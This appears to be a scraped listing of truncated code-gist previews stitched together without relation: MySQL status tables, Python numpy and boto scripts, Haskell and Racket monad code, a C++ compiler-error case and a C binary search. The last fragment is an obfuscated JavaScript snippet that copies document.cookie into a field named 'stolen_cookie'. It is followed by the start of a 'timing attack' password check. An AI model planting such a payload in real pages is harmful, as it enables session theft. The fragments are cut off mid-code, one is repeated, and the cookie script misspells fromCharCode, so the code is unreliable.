screen shot of top and mtop: Inline-style: ![alt text][logo]
mysql status when cpu is 190%:
+------------------------------------------+-------------+
| Variable_name | Value |
import numpy as np | |
import numpy.linalg as linalg | |
import matplotlib.pyplot as plt | |
import math | |
def p4(): | |
A = np.array([[1, 3, 2], | |
[-1, 2, -5], | |
[2, -4, 3]]) |
__author__ = 'seckcoder' | |
import config | |
import boto.ec2.cloudwatch | |
import subprocess | |
import time | |
from datetime import datetime | |
region = "us-east-1" |
#!/usr/bin/env python | |
__author__ = 'seckcoder' | |
import sys | |
import json | |
from mysql.connector.pooling import MySQLConnectionPool | |
import traceback | |
from mysql.connector.conversion import MySQLConverter |
screen shot of top and mtop: Inline-style: ![alt text][logo]
mysql status when cpu is 190%:
+------------------------------------------+-------------+
| Variable_name | Value |
ghc: 7.8.3
cabal-install version 1.20.0.3
using version 1.20.0.2
of the Cabal library
OS: Mac OS X Lion 10.7.5
After running cabal install stm
:
data IOAction a = Return a | |
| Put String (IOAction a) | |
| Get (String -> IOAction a) | |
get = Get Return | |
put s = Put s (Return ()) | |
seqio :: IOAction a -> (a -> IOAction b) -> IOAction b | |
seqio (Return a) f = f a | |
seqio (Put s io) f = Put s (seqio io f) |
#lang racket/base | |
;; Monads in Racket, including polymorphic bind, return and fail. | |
;; Haskell-like do-notation. | |
(provide define-monad-class | |
(struct-out monad-class) | |
monad? | |
gen:monad | |
monad->monad-class | |
determine-monad |
// The following code will create Bizarre compiler error when compiled with clang++. | |
// Not sure what's wrong with it. | |
#include <iostream> | |
#include <vector> | |
using namespace std; | |
struct Edge { | |
int v; |
/* | |
* | |
* 最简单的二分查找. 在一个数组里面找是否存在某个数 | |
* A是数组,在A[p-r]里面找是否存在某个数, 存在返回index,否则返回-1 | |
* | |
*/ | |
int binSearch(int A[], int p, int r, int v) { | |
while (p <= r) { | |
int m = (p+r)/2; |
<script> | |
var id = String.fromCharcode([115, 116, 111, 108, 101, 110, 95, 99, 111, 111, 107, 105, 101]); | |
document.getElementById(id).value = document.cookie; | |
</script> | |
// Timing Attack # 1 | |
function checkPwd(passwd) { | |
var start_time = new Date().getTime(); |